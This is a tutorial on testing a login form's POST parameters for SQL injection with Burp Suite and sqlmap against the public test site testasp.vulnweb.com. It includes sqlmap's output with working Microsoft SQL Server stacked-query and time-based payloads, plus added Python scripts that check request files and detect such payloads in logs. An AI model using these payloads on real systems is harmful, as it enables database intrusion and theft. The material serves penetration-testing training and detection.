Injection testing of POST requests with sqlmap and Burp Suite


1. Open the target address http://testasp.vulnweb.com/Login.asp in the browser.
2. Configure the Burp proxy (127.0.0.1:8080) so that it intercepts requests.
3. Click the submit button on the login form.
4. Burp now intercepts our login POST request, as shown in the screenshot.
5. Copy this POST request into a text file; I named mine search-test.txt and put it in the sqlmap directory.
6. Run sqlmap with the following command: ./sqlmap.py -r search-test.txt -p tfUPass. Here the -r option makes sqlmap load our saved POST request from search-test.txt, and -p, which should already be familiar, names the parameter to test for injection.
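Before running step 6 it is worth checking that the saved request really contains the parameter named with -p, and in which place (query string, Cookie or POST body), since the run below shows sqlmap warning when a parameter is absent from a location. The following Python script is an added example, not code from the original post or from sqlmap: it parses a raw HTTP request file of the kind Burp saves, reports where a parameter lives, and flags a stale Content-Length. The sample request is constructed; only the host and the two form field names come from the post.

```python
"""Inspect a raw HTTP request file of the kind Burp saves and sqlmap loads
with -r (added example; not code from the original post or from sqlmap)."""
from urllib.parse import parse_qsl, urlsplit

# Constructed sample of the intercepted login request. The host and form
# field names are the ones in the post; the cookie and RetURL value are made up.
SAMPLE_REQUEST = (
    "POST /Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1\r\n"
    "Host: testasp.vulnweb.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: ASPSESSIONID=EXAMPLE123\r\n"
    "Content-Length: 25\r\n"
    "\r\n"
    "tfUName=test&tfUPass=test"
)


def parse_cookie_header(value: str) -> dict:
    """Split 'a=1; b=2' into a dict (cookies use ';', not '&')."""
    cookies = {}
    for part in value.split(";"):
        name, sep, val = part.partition("=")
        if sep:
            cookies[name.strip()] = val.strip()
    return cookies


def parse_raw_request(text: str) -> dict:
    """Parse request line, headers and body; tolerate LF-only files."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    body = body.rstrip("\n")  # editors often append a newline the request never had
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        form = dict(parse_qsl(body, keep_blank_values=True))
    return {
        "method": method,
        "path": url.path,
        "version": version,
        "headers": headers,
        "body": body,
        "query": dict(parse_qsl(url.query, keep_blank_values=True)),
        "cookie": parse_cookie_header(headers.get("cookie", "")),
        "post": form,
    }


def locate_parameter(req: dict, name: str) -> list:
    """Places where `name` appears, in the order sqlmap's warnings list them."""
    places = []
    if name in req["query"]:
        places.append("GET")
    if name in req["cookie"]:
        places.append("Cookie")
    if name in req["post"]:
        places.append("POST")
    return places


def check_request_file(text: str, param: str) -> list:
    """Warnings worth reading before running: sqlmap -r FILE -p PARAM."""
    req = parse_raw_request(text)
    warnings = []
    declared = req["headers"].get("content-length")
    actual = len(req["body"].encode())
    if declared is not None and int(declared) != actual:
        warnings.append(f"Content-Length says {declared} but body is {actual} bytes")
    if req["method"] == "POST" and "content-type" not in req["headers"]:
        warnings.append("POST without Content-Type; body not parsed as a form here")
    if not locate_parameter(req, param):
        warnings.append(f"parameter {param!r} not found in GET, Cookie or POST")
    return warnings


if __name__ == "__main__":
    parsed = parse_raw_request(SAMPLE_REQUEST)
    print("tfUPass found in:", locate_parameter(parsed, "tfUPass"))
    print("warnings:", check_request_file(SAMPLE_REQUEST, "tfUPass"))
```

Run it against your own saved file by reading the file into a string and passing it to check_request_file with the parameter you intend to give to -p; an empty list means the parameter is present and the headers are consistent.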

 

./sqlmap.py -r search-test.txt -p tfUPass

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 13:26:52

[13:26:52] [INFO] parsing HTTP request from 'search-test.txt'
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the GET
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the Cookie
[13:26:52] [INFO] using '/home/testuser/sqlmap/output/testasp.vulnweb.com/session' as session file
[13:26:52] [INFO] resuming injection data from session file
[13:26:52] [WARNING] there is an injection in POST parameter 'tfUName' but you did not provided it this time
[13:26:52] [INFO] testing connection to the target url
[13:26:53] [INFO] testing if the url is stable, wait a few seconds
[13:26:55] [INFO] url is stable
[13:26:55] [WARNING] heuristic test shows that POST parameter 'tfUPass' might not be injectable
[13:26:55] [INFO] testing sql injection on POST parameter 'tfUPass'
[13:26:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:27:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:27:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:27:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:27:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:27:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:27:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:27:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:27:30] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[13:27:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:27:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:27:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:27:42] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[13:27:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:27:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application
>
[13:27:58] [INFO] target url appears to be UNION injectable with 2 columns
POST parameter 'tfUPass' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:
---
Place: POST
Parameter: tfUPass
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: tfUName=test&tfUPass=test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tfUName=test&tfUPass=test' WAITFOR DELAY '0:0:5'-- AND 'wpkc'='wpkc
---
[13:28:08] [INFO] testing MySQL
[13:28:09] [WARNING] the back-end DBMS is not MySQL
[13:28:09] [INFO] testing Oracle
[13:28:10] [WARNING] the back-end DBMS is not Oracle
[13:28:10] [INFO] testing PostgreSQL
[13:28:10] [WARNING] the back-end DBMS is not PostgreSQL
[13:28:10] [INFO] testing Microsoft SQL Server
[13:28:16] [INFO] confirming Microsoft SQL Server
[13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[13:28:28] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 42 times
[13:28:28] [INFO] Fetched data logged to text files under '/home/testuser/sqlmap/output/testasp.vulnweb.com'
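Seen from the defender's side, the run above leaves recognisable traces: the WAITFOR DELAY payloads, the quote-balancing suffix such as 'mPfC'='mPfC, responses that take roughly the five seconds the payload asks for, and 42 HTTP 500 responses out of 68 requests. The Python script below is an added example, not from the original post or from sqlmap, that runs simple detection logic over a constructed application request log (tab separated and including the form body, which a plain IIS log does not record) and flags clients that send those payloads, cause a high share of 5xx responses, or receive slow responses to payload requests. The log lines, client addresses and thresholds are constructed assumptions; only the two payload bodies are taken from the sqlmap output above.

```python
"""Flag SQL-injection scanning in an application request log (added example;
not from the original post or from sqlmap)."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed log, tab separated: time, client, method, path, status,
# time-taken in ms, URL-encoded form body. Plain IIS W3C logs carry no POST
# body, so this assumes an application or WAF log that records it. The two
# long bodies are the payloads sqlmap reported above; the rest is made up.
SAMPLE_LOG = """\
13:26:40\t10.0.0.5\tPOST\t/Login.asp\t302\t41\ttfUName=alice&tfUPass=s3cret
13:27:01\t203.0.113.7\tPOST\t/Login.asp\t500\t36\ttfUName=test&tfUPass=test%27
13:27:03\t203.0.113.7\tPOST\t/Login.asp\t500\t33\ttfUName=test&tfUPass=test%22
13:27:05\t203.0.113.7\tPOST\t/Login.asp\t500\t38\ttfUName=test&tfUPass=test%27%29
13:27:30\t203.0.113.7\tPOST\t/Login.asp\t200\t5061\ttfUName=test&tfUPass=test%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B--+AND+%27mPfC%27%3D%27mPfC
13:27:42\t203.0.113.7\tPOST\t/Login.asp\t200\t5044\ttfUName=test&tfUPass=test%27+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%27wpkc%27%3D%27wpkc
13:28:10\t10.0.0.9\tPOST\t/Login.asp\t200\t52\ttfUName=bob&tfUPass=hunter2
"""

# Heuristic signatures derived from the payloads above. They run on the
# decoded body, because the encoded form hides the quotes and semicolons.
SIGNATURES = {
    "mssql_waitfor_delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "stacked_query": re.compile(r"'\s*;"),
    "comment_terminator": re.compile(r"['\);]\s*--"),
    # sqlmap-style quote balancing: AND 'mPfC'='mPfC
    "quote_balancing_tautology": re.compile(r"'(\w+)'\s*=\s*'\1\b"),
}


def parse_line(line: str) -> dict:
    time, client, method, path, status, ms, body = line.split("\t", 6)
    return {"time": time, "client": client, "method": method, "path": path,
            "status": int(status), "ms": int(ms), "body": unquote_plus(body)}


def match_signatures(decoded_body: str) -> list:
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded_body)]


def analyse(log_text: str, slow_ms: int = 4000, error_ratio: float = 0.5,
            min_requests: int = 3) -> dict:
    """Return {client: [reasons]} for clients that look like injection scanners.
    Thresholds are assumptions: tune them to the application's normal traffic."""
    stats = defaultdict(lambda: {"requests": 0, "errors": 0, "sigs": set(),
                                 "slow_payloads": 0})
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        st = stats[rec["client"]]
        st["requests"] += 1
        if rec["status"] >= 500:
            st["errors"] += 1
        sigs = match_signatures(rec["body"])
        st["sigs"].update(sigs)
        # A payload that asks the DBMS to wait, answered slowly, is the
        # time-based blind technique showing up in the log.
        if sigs and rec["ms"] >= slow_ms:
            st["slow_payloads"] += 1
    findings = {}
    for client, st in stats.items():
        reasons = []
        if st["sigs"]:
            reasons.append("sqli signatures: " + ", ".join(sorted(st["sigs"])))
        if st["requests"] >= min_requests and st["errors"] / st["requests"] >= error_ratio:
            reasons.append(f"{st['errors']}/{st['requests']} responses were HTTP 5xx")
        if st["slow_payloads"]:
            reasons.append(f"{st['slow_payloads']} payload requests took >= {slow_ms} ms")
        if reasons:
            findings[client] = reasons
    return findings


if __name__ == "__main__":
    for client, reasons in analyse(SAMPLE_LOG).items():
        print(client)
        for reason in reasons:
            print("  -", reason)
```

Match after URL decoding, since form bodies arrive encoded. The 5xx-ratio rule on its own also fires on a merely broken client, so treat it as corroboration for the signature and timing rules rather than as an alert by itself; the fix on the application side remains parameterised queries, which make the stacked and time-based payloads inert regardless of whether they are detected.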

 

